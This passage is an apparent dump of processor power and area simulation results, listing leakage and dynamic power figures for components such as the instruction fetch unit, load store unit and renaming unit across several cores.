'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Peak Dynamic': 0.0142575,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Runtime Dynamic': 0.00162371,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Subthreshold Leakage': 0.00384344,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Subthreshold Leakage with power gating': 0.00198631,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Area': 0.0151917,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Gate Leakage': 8.00196e-05,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Peak Dynamic': 0.00527447,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Runtime Dynamic': 0.000650641,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Subthreshold Leakage': 0.00181347,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Subthreshold Leakage with power gating': 0.000957045,
'Instruction Fetch Unit/Branch Predictor/Peak Dynamic': 0.0597838,
'Instruction Fetch Unit/Branch Predictor/RAS/Area': 0.0105732,
'Instruction Fetch Unit/Branch Predictor/RAS/Gate Leakage': 4.63858e-05,
'Instruction Fetch Unit/Branch Predictor/RAS/Peak Dynamic': 0.0117602,
'Instruction Fetch Unit/Branch Predictor/RAS/Runtime Dynamic': 0.00110493,
'Instruction Fetch Unit/Branch Predictor/RAS/Subthreshold Leakage': 0.000932505,
'Instruction Fetch Unit/Branch Predictor/RAS/Subthreshold Leakage with power gating': 0.000494733,
'Instruction Fetch Unit/Branch Predictor/Runtime Dynamic': 0.00636433,
'Instruction Fetch Unit/Branch Predictor/Subthreshold Leakage': 0.0199703,
'Instruction Fetch Unit/Branch Predictor/Subthreshold Leakage with power gating': 0.0103282,
'Instruction Fetch Unit/Branch Target Buffer/Area': 0.64954,
'Instruction Fetch Unit/Branch Target Buffer/Gate Leakage': 0.00272758,
'Instruction Fetch Unit/Branch Target Buffer/Peak Dynamic': 0.177867,
'Instruction Fetch Unit/Branch Target Buffer/Runtime Dynamic': 0.0159872,
'Instruction Fetch Unit/Branch Target Buffer/Subthreshold Leakage': 0.0811682,
'Instruction Fetch Unit/Branch Target Buffer/Subthreshold Leakage with power gating': 0.0435357,
'Instruction Fetch Unit/Gate Leakage': 0.0589979,
'Instruction Fetch Unit/Instruction Buffer/Area': 0.0226323,
'Instruction Fetch Unit/Instruction Buffer/Gate Leakage': 6.83558e-05,
'Instruction Fetch Unit/Instruction Buffer/Peak Dynamic': 0.606827,
'Instruction Fetch Unit/Instruction Buffer/Runtime Dynamic': 0.0739427,
'Instruction Fetch Unit/Instruction Buffer/Subthreshold Leakage': 0.00151885,
'Instruction Fetch Unit/Instruction Buffer/Subthreshold Leakage with power gating': 0.000701682,
'Instruction Fetch Unit/Instruction Cache/Area': 3.14635,
'Instruction Fetch Unit/Instruction Cache/Gate Leakage': 0.029931,
'Instruction Fetch Unit/Instruction Cache/Peak Dynamic': 4.70339,
'Instruction Fetch Unit/Instruction Cache/Runtime Dynamic': 0.218692,
'Instruction Fetch Unit/Instruction Cache/Subthreshold Leakage': 0.367022,
'Instruction Fetch Unit/Instruction Cache/Subthreshold Leakage with power gating': 0.180386,
'Instruction Fetch Unit/Instruction Decoder/Area': 1.85799,
'Instruction Fetch Unit/Instruction Decoder/Gate Leakage': 0.0222493,
'Instruction Fetch Unit/Instruction Decoder/Peak Dynamic': 1.37404,
'Instruction Fetch Unit/Instruction Decoder/Runtime Dynamic': 0.251143,
'Instruction Fetch Unit/Instruction Decoder/Subthreshold Leakage': 0.442943,
'Instruction Fetch Unit/Instruction Decoder/Subthreshold Leakage with power gating': 0.166104,
'Instruction Fetch Unit/Peak Dynamic': 7.15017,
'Instruction Fetch Unit/Runtime Dynamic': 0.566128,
'Instruction Fetch Unit/Subthreshold Leakage': 0.932286,
'Instruction Fetch Unit/Subthreshold Leakage with power gating': 0.40843,
'L2/Area': 4.53318,
'L2/Gate Leakage': 0.015464,
'L2/Peak Dynamic': 0.0400528,
'L2/Runtime Dynamic': 0.0106666,
'L2/Subthreshold Leakage': 0.834142,
'L2/Subthreshold Leakage with power gating': 0.401066,
'Load Store Unit/Area': 8.80901,
'Load Store Unit/Data Cache/Area': 6.84535,
'Load Store Unit/Data Cache/Gate Leakage': 0.0279261,
'Load Store Unit/Data Cache/Peak Dynamic': 3.64147,
'Load Store Unit/Data Cache/Runtime Dynamic': 1.16807,
'Load Store Unit/Data Cache/Subthreshold Leakage': 0.527675,
'Load Store Unit/Data Cache/Subthreshold Leakage with power gating': 0.25085,
'Load Store Unit/Gate Leakage': 0.0350888,
'Load Store Unit/LoadQ/Area': 0.0836782,
'Load Store Unit/LoadQ/Gate Leakage': 0.00059896,
'Load Store Unit/LoadQ/Peak Dynamic': 0.0777864,
'Load Store Unit/LoadQ/Runtime Dynamic': 0.0777863,
'Load Store Unit/LoadQ/Subthreshold Leakage': 0.00941961,
'Load Store Unit/LoadQ/Subthreshold Leakage with power gating': 0.00536918,
'Load Store Unit/Peak Dynamic': 4.00879,
'Load Store Unit/Runtime Dynamic': 1.62947,
'Load Store Unit/StoreQ/Area': 0.322079,
'Load Store Unit/StoreQ/Gate Leakage': 0.00329971,
'Load Store Unit/StoreQ/Peak Dynamic': 0.191808,
'Load Store Unit/StoreQ/Runtime Dynamic': 0.383615,
'Load Store Unit/StoreQ/Subthreshold Leakage': 0.0345621,
'Load Store Unit/StoreQ/Subthreshold Leakage with power gating': 0.0197004,
'Load Store Unit/Subthreshold Leakage': 0.591321,
'Load Store Unit/Subthreshold Leakage with power gating': 0.283293,
'Memory Management Unit/Area': 0.4339,
'Memory Management Unit/Dtlb/Area': 0.0879726,
'Memory Management Unit/Dtlb/Gate Leakage': 0.00088729,
'Memory Management Unit/Dtlb/Peak Dynamic': 0.0680733,
'Memory Management Unit/Dtlb/Runtime Dynamic': 0.0685959,
'Memory Management Unit/Dtlb/Subthreshold Leakage': 0.0155699,
'Memory Management Unit/Dtlb/Subthreshold Leakage with power gating': 0.00887485,
'Memory Management Unit/Gate Leakage': 0.00808595,
'Memory Management Unit/Itlb/Area': 0.301552,
'Memory Management Unit/Itlb/Gate Leakage': 0.00393464,
'Memory Management Unit/Itlb/Peak Dynamic': 0.29244,
'Memory Management Unit/Itlb/Runtime Dynamic': 0.0360843,
'Memory Management Unit/Itlb/Subthreshold Leakage': 0.0413758,
'Memory Management Unit/Itlb/Subthreshold Leakage with power gating': 0.0235842,
'Memory Management Unit/Peak Dynamic': 0.565486,
'Memory Management Unit/Runtime Dynamic': 0.10468,
'Memory Management Unit/Subthreshold Leakage': 0.0766103,
'Memory Management Unit/Subthreshold Leakage with power gating': 0.0398333,
'Peak Dynamic': 19.9931,
'Renaming Unit/Area': 0.303608,
'Renaming Unit/FP Front End RAT/Area': 0.131045,
'Renaming Unit/FP Front End RAT/Gate Leakage': 0.00351123,
'Renaming Unit/FP Front End RAT/Peak Dynamic': 2.51468,
'Renaming Unit/FP Front End RAT/Runtime Dynamic': 0.0830406,
'Renaming Unit/FP Front End RAT/Subthreshold Leakage': 0.0308571,
'Renaming Unit/FP Front End RAT/Subthreshold Leakage with power gating': 0.0175885,
'Renaming Unit/Free List/Area': 0.0340654,
'Renaming Unit/Free List/Gate Leakage': 2.5481e-05,
'Renaming Unit/Free List/Peak Dynamic': 0.0306032,
'Renaming Unit/Free List/Runtime Dynamic': 0.0121977,
'Renaming Unit/Free List/Subthreshold Leakage': 0.000370144,
'Renaming Unit/Free List/Subthreshold Leakage with power gating': 0.000201064,
'Renaming Unit/Gate Leakage': 0.00708398,
'Renaming Unit/Int Front End RAT/Area': 0.0941223,
'Renaming Unit/Int Front End RAT/Gate Leakage': 0.000283242,
'Renaming Unit/Int Front End RAT/Peak Dynamic': 0.731965,
'Renaming Unit/Int Front End RAT/Runtime Dynamic': 0.126534,
'Renaming Unit/Int Front End RAT/Subthreshold Leakage': 0.00435488,
'Renaming Unit/Int Front End RAT/Subthreshold Leakage with power gating': 0.00248228,
'Renaming Unit/Peak Dynamic': 3.58947,
'Renaming Unit/Runtime Dynamic': 0.221772,
'Renaming Unit/Subthreshold Leakage': 0.0552466,
'Renaming Unit/Subthreshold Leakage with power gating': 0.0276461,
'Runtime Dynamic': 4.62458,
'Subthreshold Leakage': 6.16288,
'Subthreshold Leakage with power gating': 2.55328},
{'Area': 32.0201,
'Execution Unit/Area': 7.68434,
'Execution Unit/Complex ALUs/Area': 0.235435,
'Execution Unit/Complex ALUs/Gate Leakage': 0.0132646,
'Execution Unit/Complex ALUs/Peak Dynamic': 0.0603411,
'Execution Unit/Complex ALUs/Runtime Dynamic': 0.250083,
'Execution Unit/Complex ALUs/Subthreshold Leakage': 0.20111,
'Execution Unit/Complex ALUs/Subthreshold Leakage with power gating': 0.0754163,
'Execution Unit/Floating Point Units/Area': 4.6585,
'Execution Unit/Floating Point Units/Gate Leakage': 0.0656156,
'Execution Unit/Floating Point Units/Peak Dynamic': 0.259349,
'Execution Unit/Floating Point Units/Runtime Dynamic': 0.304033,
'Execution Unit/Floating Point Units/Subthreshold Leakage': 0.994829,
'Execution Unit/Floating Point Units/Subthreshold Leakage with power gating': 0.373061,
'Execution Unit/Gate Leakage': 0.120359,
'Execution Unit/Instruction Scheduler/Area': 1.66526,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Area': 0.275653,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Gate Leakage': 0.000977433,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Peak Dynamic': 1.04181,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Runtime Dynamic': 0.249152,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Subthreshold Leakage': 0.0143453,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Subthreshold Leakage with power gating': 0.00810519,
'Execution Unit/Instruction Scheduler/Gate Leakage': 0.00568913,
'Execution Unit/Instruction Scheduler/Instruction Window/Area': 0.805223,
'Execution Unit/Instruction Scheduler/Instruction Window/Gate Leakage': 0.00414562,
'Execution Unit/Instruction Scheduler/Instruction Window/Peak Dynamic': 1.6763,
'Execution Unit/Instruction Scheduler/Instruction Window/Runtime Dynamic': 0.401873,
'Execution Unit/Instruction Scheduler/Instruction Window/Subthreshold Leakage': 0.0625755,
'Execution Unit/Instruction Scheduler/Instruction Window/Subthreshold Leakage with power gating': 0.0355964,
'Execution Unit/Instruction Scheduler/Peak Dynamic': 3.82262,
'Execution Unit/Instruction Scheduler/ROB/Area': 0.584388,
'Execution Unit/Instruction Scheduler/ROB/Gate Leakage': 0.00056608,
'Execution Unit/Instruction Scheduler/ROB/Peak Dynamic': 1.10451,
'Execution Unit/Instruction Scheduler/ROB/Runtime Dynamic': 0.202852,
'Execution Unit/Instruction Scheduler/ROB/Subthreshold Leakage': 0.00906853,
'Execution Unit/Instruction Scheduler/ROB/Subthreshold Leakage with power gating': 0.00364446,
'Execution Unit/Instruction Scheduler/Runtime Dynamic': 0.853877,
'Execution Unit/Instruction Scheduler/Subthreshold Leakage': 0.0859892,
'Execution Unit/Instruction Scheduler/Subthreshold Leakage with power gating': 0.047346,
'Execution Unit/Integer ALUs/Area': 0.47087,
'Execution Unit/Integer ALUs/Gate Leakage': 0.0265291,
'Execution Unit/Integer ALUs/Peak Dynamic': 0.245195,
'Execution Unit/Integer ALUs/Runtime Dynamic': 0.101344,
'Execution Unit/Integer ALUs/Subthreshold Leakage': 0.40222,
'Execution Unit/Integer ALUs/Subthreshold Leakage with power gating': 0.150833,
'Execution Unit/Peak Dynamic': 4.79785,
'Execution Unit/Register Files/Area': 0.570804,
'Execution Unit/Register Files/Floating Point RF/Area': 0.208131,
'Execution Unit/Register Files/Floating Point RF/Gate Leakage': 0.000232788,
'Execution Unit/Register Files/Floating Point RF/Peak Dynamic': 0.0489966,
'Execution Unit/Register Files/Floating Point RF/Runtime Dynamic': 0.0104506,
'Execution Unit/Register Files/Floating Point RF/Subthreshold Leakage': 0.00399698,
'Execution Unit/Register Files/Floating Point RF/Subthreshold Leakage with power gating': 0.00176968,
'Execution Unit/Register Files/Gate Leakage': 0.000622708,
'Execution Unit/Register Files/Integer RF/Area': 0.362673,
'Execution Unit/Register Files/Integer RF/Gate Leakage': 0.00038992,
'Execution Unit/Register Files/Integer RF/Peak Dynamic': 0.100866,
'Execution Unit/Register Files/Integer RF/Runtime Dynamic': 0.0772882,
'Execution Unit/Register Files/Integer RF/Subthreshold Leakage': 0.00614175,
'Execution Unit/Register Files/Integer RF/Subthreshold Leakage with power gating': 0.00246675,
'Execution Unit/Register Files/Peak Dynamic': 0.149862,
'Execution Unit/Register Files/Runtime Dynamic': 0.0877388,
'Execution Unit/Register Files/Subthreshold Leakage': 0.0101387,
'Execution Unit/Register Files/Subthreshold Leakage with power gating': 0.00423643,
'Execution Unit/Results Broadcast Bus/Area Overhead': 0.0390912,
'Execution Unit/Results Broadcast Bus/Gate Leakage': 0.00537402,
'Execution Unit/Results Broadcast Bus/Peak Dynamic': 0.227584,
'Execution Unit/Results Broadcast Bus/Runtime Dynamic': 0.538882,
'Execution Unit/Results Broadcast Bus/Subthreshold Leakage': 0.081478,
'Execution Unit/Results Broadcast Bus/Subthreshold Leakage with power gating': 0.0305543,
'Execution Unit/Runtime Dynamic': 2.13596,
'Execution Unit/Subthreshold Leakage': 1.79543,
'Execution Unit/Subthreshold Leakage with power gating': 0.688821,
'Gate Leakage': 0.368936,
'Instruction Fetch Unit/Area': 5.85939,
'Instruction Fetch Unit/Branch Predictor/Area': 0.138516,
'Instruction Fetch Unit/Branch Predictor/Chooser/Area': 0.0435221,
'Instruction Fetch Unit/Branch Predictor/Chooser/Gate Leakage': 0.000278362,
'Instruction Fetch Unit/Branch Predictor/Chooser/Peak Dynamic': 0.0168831,
'Instruction Fetch Unit/Branch Predictor/Chooser/Runtime Dynamic': 0.00172874,
'Instruction Fetch Unit/Branch Predictor/Chooser/Subthreshold Leakage': 0.00759719,
'Instruction Fetch Unit/Branch Predictor/Chooser/Subthreshold Leakage with power gating': 0.0039236,
'Instruction Fetch Unit/Branch Predictor/Gate Leakage': 0.000757657,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Area': 0.0435221,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Gate Leakage': 0.000278362,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Peak Dynamic': 0.0168831,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Runtime Dynamic': 0.00172874,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Subthreshold Leakage': 0.00759719,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Subthreshold Leakage with power gating': 0.0039236,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Area': 0.0257064,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Gate Leakage': 0.000154548,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Peak Dynamic': 0.0142575,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Runtime Dynamic': 0.00155042,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Subthreshold Leakage': 0.00384344,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Subthreshold Leakage with power gating': 0.00198631,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Area': 0.0151917,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Gate Leakage': 8.00196e-05,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Peak Dynamic': 0.00527447,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Runtime Dynamic': 0.000624638,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Subthreshold Leakage': 0.00181347,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Subthreshold Leakage with power gating': 0.000957045,
'Instruction Fetch Unit/Branch Predictor/Peak Dynamic': 0.0597838,
'Instruction Fetch Unit/Branch Predictor/RAS/Area': 0.0105732,
'Instruction Fetch Unit/Branch Predictor/RAS/Gate Leakage': 4.63858e-05,
'Instruction Fetch Unit/Branch Predictor/RAS/Peak Dynamic': 0.0117602,
'Instruction Fetch Unit/Branch Predictor/RAS/Runtime Dynamic': 0.00111025,
'Instruction Fetch Unit/Branch Predictor/RAS/Subthreshold Leakage': 0.000932505,
'Instruction Fetch Unit/Branch Predictor/RAS/Subthreshold Leakage with power gating': 0.000494733,
'Instruction Fetch Unit/Branch Predictor/Runtime Dynamic': 0.00611814,
'Instruction Fetch Unit/Branch Predictor/Subthreshold Leakage': 0.0199703,
'Instruction Fetch Unit/Branch Predictor/Subthreshold Leakage with power gating': 0.0103282,
'Instruction Fetch Unit/Branch Target Buffer/Area': 0.64954,
'Instruction Fetch Unit/Branch Target Buffer/Gate Leakage': 0.00272758,
'Instruction Fetch Unit/Branch Target Buffer/Peak Dynamic': 0.177867,
'Instruction Fetch Unit/Branch Target Buffer/Runtime Dynamic': 0.0149781,
'Instruction Fetch Unit/Branch Target Buffer/Subthreshold Leakage': 0.0811682,
'Instruction Fetch Unit/Branch Target Buffer/Subthreshold Leakage with power gating': 0.0435357,
'Instruction Fetch Unit/Gate Leakage': 0.0589979,
'Instruction Fetch Unit/Instruction Buffer/Area': 0.0226323,
'Instruction Fetch Unit/Instruction Buffer/Gate Leakage': 6.83558e-05,
'Instruction Fetch Unit/Instruction Buffer/Peak Dynamic': 0.606827,
'Instruction Fetch Unit/Instruction Buffer/Runtime Dynamic': 0.0742991,
'Instruction Fetch Unit/Instruction Buffer/Subthreshold Leakage': 0.00151885,
'Instruction Fetch Unit/Instruction Buffer/Subthreshold Leakage with power gating': 0.000701682,
'Instruction Fetch Unit/Instruction Cache/Area': 3.14635,
'Instruction Fetch Unit/Instruction Cache/Gate Leakage': 0.029931,
'Instruction Fetch Unit/Instruction Cache/Peak Dynamic': 4.72606,
'Instruction Fetch Unit/Instruction Cache/Runtime Dynamic': 0.226296,
'Instruction Fetch Unit/Instruction Cache/Subthreshold Leakage': 0.367022,
'Instruction Fetch Unit/Instruction Cache/Subthreshold Leakage with power gating': 0.180386,
'Instruction Fetch Unit/Instruction Decoder/Area': 1.85799,
'Instruction Fetch Unit/Instruction Decoder/Gate Leakage': 0.0222493,
'Instruction Fetch Unit/Instruction Decoder/Peak Dynamic': 1.37404,
'Instruction Fetch Unit/Instruction Decoder/Runtime Dynamic': 0.252353,
'Instruction Fetch Unit/Instruction Decoder/Subthreshold Leakage': 0.442943,
'Instruction Fetch Unit/Instruction Decoder/Subthreshold Leakage with power gating': 0.166104,
'Instruction Fetch Unit/Peak Dynamic': 7.17394,
'Instruction Fetch Unit/Runtime Dynamic': 0.574045,
'Instruction Fetch Unit/Subthreshold Leakage': 0.932286,
'Instruction Fetch Unit/Subthreshold Leakage with power gating': 0.40843,
'L2/Area': 4.53318,
'L2/Gate Leakage': 0.015464,
'L2/Peak Dynamic': 0.0211766,
'L2/Runtime Dynamic': 0.00488633,
'L2/Subthreshold Leakage': 0.834142,
'L2/Subthreshold Leakage with power gating': 0.401066,
'Load Store Unit/Area': 8.80901,
'Load Store Unit/Data Cache/Area': 6.84535,
'Load Store Unit/Data Cache/Gate Leakage': 0.0279261,
'Load Store Unit/Data Cache/Peak Dynamic': 3.43835,
'Load Store Unit/Data Cache/Runtime Dynamic': 1.06337,
'Load Store Unit/Data Cache/Subthreshold Leakage': 0.527675,
'Load Store Unit/Data Cache/Subthreshold Leakage with power gating': 0.25085,
'Load Store Unit/Gate Leakage': 0.0350888,
'Load Store Unit/LoadQ/Area': 0.0836782,
'Load Store Unit/LoadQ/Gate Leakage': 0.00059896,
'Load Store Unit/LoadQ/Peak Dynamic': 0.0712149,
'Load Store Unit/LoadQ/Runtime Dynamic': 0.071215,
'Load Store Unit/LoadQ/Subthreshold Leakage': 0.00941961,
'Load Store Unit/LoadQ/Subthreshold Leakage with power gating': 0.00536918,
'Load Store Unit/Peak Dynamic': 3.77464,
'Load Store Unit/Runtime Dynamic': 1.48579,
'Load Store Unit/StoreQ/Area': 0.322079,
'Load Store Unit/StoreQ/Gate Leakage': 0.00329971,
'Load Store Unit/StoreQ/Peak Dynamic': 0.175604,
'Load Store Unit/StoreQ/Runtime Dynamic': 0.351208,
'Load Store Unit/StoreQ/Subthreshold Leakage': 0.0345621,
'Load Store Unit/StoreQ/Subthreshold Leakage with power gating': 0.0197004,
'Load Store Unit/Subthreshold Leakage': 0.591321,
'Load Store Unit/Subthreshold Leakage with power gating': 0.283293,
'Memory Management Unit/Area': 0.4339,
'Memory Management Unit/Dtlb/Area': 0.0879726,
'Memory Management Unit/Dtlb/Gate Leakage': 0.00088729,
'Memory Management Unit/Dtlb/Peak Dynamic': 0.0623224,
'Memory Management Unit/Dtlb/Runtime Dynamic': 0.0625822,
'Memory Management Unit/Dtlb/Subthreshold Leakage': 0.0155699,
'Memory Management Unit/Dtlb/Subthreshold Leakage with power gating': 0.00887485,
'Memory Management Unit/Gate Leakage': 0.00808595,
'Memory Management Unit/Itlb/Area': 0.301552,
'Memory Management Unit/Itlb/Gate Leakage': 0.00393464,
'Memory Management Unit/Itlb/Peak Dynamic': 0.293849,
'Memory Management Unit/Itlb/Runtime Dynamic': 0.0372702,
'Memory Management Unit/Itlb/Subthreshold Leakage': 0.0413758,
'Memory Management Unit/Itlb/Subthreshold Leakage with power gating': 0.0235842,
'Memory Management Unit/Peak Dynamic': 0.557017,
'Memory Management Unit/Runtime Dynamic': 0.0998523,
'Memory Management Unit/Subthreshold Leakage': 0.0766103,
'Memory Management Unit/Subthreshold Leakage with power gating': 0.0398333,
'Peak Dynamic': 19.9141,
'Renaming Unit/Area': 0.303608,
'Renaming Unit/FP Front End RAT/Area': 0.131045,
'Renaming Unit/FP Front End RAT/Gate Leakage': 0.00351123,
'Renaming Unit/FP Front End RAT/Peak Dynamic': 2.51468,
'Renaming Unit/FP Front End RAT/Runtime Dynamic': 0.128888,
'Renaming Unit/FP Front End RAT/Subthreshold Leakage': 0.0308571,
'Renaming Unit/FP Front End RAT/Subthreshold Leakage with power gating': 0.0175885,
'Renaming Unit/Free List/Area': 0.0340654,
'Renaming Unit/Free List/Gate Leakage': 2.5481e-05,
'Renaming Unit/Free List/Peak Dynamic': 0.0306032,
'Renaming Unit/Free List/Runtime Dynamic': 0.0128096,
'Renaming Unit/Free List/Subthreshold Leakage': 0.000370144,
'Renaming Unit/Free List/Subthreshold Leakage with power gating': 0.000201064,
'Renaming Unit/Gate Leakage': 0.00708398,
'Renaming Unit/Int Front End RAT/Area': 0.0941223,
'Renaming Unit/Int Front End RAT/Gate Leakage': 0.000283242,
'Renaming Unit/Int Front End RAT/Peak Dynamic': 0.731965,
'Renaming Unit/Int Front End RAT/Runtime Dynamic': 0.125747,
'Renaming Unit/Int Front End RAT/Subthreshold Leakage': 0.00435488,
'Renaming Unit/Int Front End RAT/Subthreshold Leakage with power gating': 0.00248228,
'Renaming Unit/Peak Dynamic': 3.58947,
'Renaming Unit/Runtime Dynamic': 0.267444,
'Renaming Unit/Subthreshold Leakage': 0.0552466,
'Renaming Unit/Subthreshold Leakage with power gating': 0.0276461,
'Runtime Dynamic': 4.56798,
'Subthreshold Leakage': 6.16288,
'Subthreshold Leakage with power gating': 2.55328},
{'Area': 32.0201,
'Execution Unit/Area': 7.68434,
'Execution Unit/Complex ALUs/Area': 0.235435,
'Execution Unit/Complex ALUs/Gate Leakage': 0.0132646,
'Execution Unit/Complex ALUs/Peak Dynamic': 0.190515,
'Execution Unit/Complex ALUs/Runtime Dynamic': 0.352327,
'Execution Unit/Complex ALUs/Subthreshold Leakage': 0.20111,
'Execution Unit/Complex ALUs/Subthreshold Leakage with power gating': 0.0754163,
'Execution Unit/Floating Point Units/Area': 4.6585,
'Execution Unit/Floating Point Units/Gate Leakage': 0.0656156,
'Execution Unit/Floating Point Units/Peak Dynamic': 1.01422,
'Execution Unit/Floating Point Units/Runtime Dynamic': 0.304033,
'Execution Unit/Floating Point Units/Subthreshold Leakage': 0.994829,
'Execution Unit/Floating Point Units/Subthreshold Leakage with power gating': 0.373061,
'Execution Unit/Gate Leakage': 0.120359,
'Execution Unit/Instruction Scheduler/Area': 1.66526,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Area': 0.275653,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Gate Leakage': 0.000977433,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Peak Dynamic': 1.04181,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Runtime Dynamic': 0.299881,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Subthreshold Leakage': 0.0143453,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Subthreshold Leakage with power gating': 0.00810519,
'Execution Unit/Instruction Scheduler/Gate Leakage': 0.00568913,
'Execution Unit/Instruction Scheduler/Instruction Window/Area': 0.805223,
'Execution Unit/Instruction Scheduler/Instruction Window/Gate Leakage': 0.00414562,
'Execution Unit/Instruction Scheduler/Instruction Window/Peak Dynamic': 1.6763,
'Execution Unit/Instruction Scheduler/Instruction Window/Runtime Dynamic': 0.483697,
'Execution Unit/Instruction Scheduler/Instruction Window/Subthreshold Leakage': 0.0625755,
'Execution Unit/Instruction Scheduler/Instruction Window/Subthreshold Leakage with power gating': 0.0355964,
'Execution Unit/Instruction Scheduler/Peak Dynamic': 3.82262,
'Execution Unit/Instruction Scheduler/ROB/Area': 0.584388,
'Execution Unit/Instruction Scheduler/ROB/Gate Leakage': 0.00056608,
'Execution Unit/Instruction Scheduler/ROB/Peak Dynamic': 1.10451,
'Execution Unit/Instruction Scheduler/ROB/Runtime Dynamic': 0.244154,
'Execution Unit/Instruction Scheduler/ROB/Subthreshold Leakage': 0.00906853,
'Execution Unit/Instruction Scheduler/ROB/Subthreshold Leakage with power gating': 0.00364446,
'Execution Unit/Instruction Scheduler/Runtime Dynamic': 1.02773,
'Execution Unit/Instruction Scheduler/Subthreshold Leakage': 0.0859892,
'Execution Unit/Instruction Scheduler/Subthreshold Leakage with power gating': 0.047346,
'Execution Unit/Integer ALUs/Area': 0.47087,
'Execution Unit/Integer ALUs/Gate Leakage': 0.0265291,
'Execution Unit/Integer ALUs/Peak Dynamic': 0.187482,
'Execution Unit/Integer ALUs/Runtime Dynamic': 0.101344,
'Execution Unit/Integer ALUs/Subthreshold Leakage': 0.40222,
'Execution Unit/Integer ALUs/Subthreshold Leakage with power gating': 0.150833,
'Execution Unit/Peak Dynamic': 5.98524,
'Execution Unit/Register Files/Area': 0.570804,
'Execution Unit/Register Files/Floating Point RF/Area': 0.208131,
'Execution Unit/Register Files/Floating Point RF/Gate Leakage': 0.000232788,
'Execution Unit/Register Files/Floating Point RF/Peak Dynamic': 0.191607,
'Execution Unit/Register Files/Floating Point RF/Runtime Dynamic': 0.0125783,
'Execution Unit/Register Files/Floating Point RF/Subthreshold Leakage': 0.00399698,
'Execution Unit/Register Files/Floating Point RF/Subthreshold Leakage with power gating': 0.00176968,
'Execution Unit/Register Files/Gate Leakage': 0.000622708,
'Execution Unit/Register Files/Integer RF/Area': 0.362673,
'Execution Unit/Register Files/Integer RF/Gate Leakage': 0.00038992,
'Execution Unit/Register Files/Integer RF/Peak Dynamic': 0.162877,
'Execution Unit/Register Files/Integer RF/Runtime Dynamic': 0.0930246,
'Execution Unit/Register Files/Integer RF/Subthreshold Leakage': 0.00614175,
'Execution Unit/Register Files/Integer RF/Subthreshold Leakage with power gating': 0.00246675,
'Execution Unit/Register Files/Peak Dynamic': 0.354484,
'Execution Unit/Register Files/Runtime Dynamic': 0.105603,
'Execution Unit/Register Files/Subthreshold Leakage': 0.0101387,
'Execution Unit/Register Files/Subthreshold Leakage with power gating': 0.00423643,
'Execution Unit/Results Broadcast Bus/Area Overhead': 0.0390912,
'Execution Unit/Results Broadcast Bus/Gate Leakage': 0.00537402,
'Execution Unit/Results Broadcast Bus/Peak Dynamic': 0.390775,
'Execution Unit/Results Broadcast Bus/Runtime Dynamic': 0.788674,
'Execution Unit/Results Broadcast Bus/Subthreshold Leakage': 0.081478,
'Execution Unit/Results Broadcast Bus/Subthreshold Leakage with power gating': 0.0305543,
'Execution Unit/Runtime Dynamic': 2.67971,
'Execution Unit/Subthreshold Leakage': 1.79543,
'Execution Unit/Subthreshold Leakage with power gating': 0.688821,
'Gate Leakage': 0.368936,
'Instruction Fetch Unit/Area': 5.85939,
'Instruction Fetch Unit/Branch Predictor/Area': 0.138516,
'Instruction Fetch Unit/Branch Predictor/Chooser/Area': 0.0435221,
'Instruction Fetch Unit/Branch Predictor/Chooser/Gate Leakage': 0.000278362,
'Instruction Fetch Unit/Branch Predictor/Chooser/Peak Dynamic': 0.0168831,
'Instruction Fetch Unit/Branch Predictor/Chooser/Runtime Dynamic': 0.000870459,
'Instruction Fetch Unit/Branch Predictor/Chooser/Subthreshold Leakage': 0.00759719,
'Instruction Fetch Unit/Branch Predictor/Chooser/Subthreshold Leakage with power gating': 0.0039236,
'Instruction Fetch Unit/Branch Predictor/Gate Leakage': 0.000757657,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Area': 0.0435221,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Gate Leakage': 0.000278362,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Peak Dynamic': 0.0168831,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Runtime Dynamic': 0.000870459,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Subthreshold Leakage': 0.00759719,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Subthreshold Leakage with power gating': 0.0039236,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Area': 0.0257064,
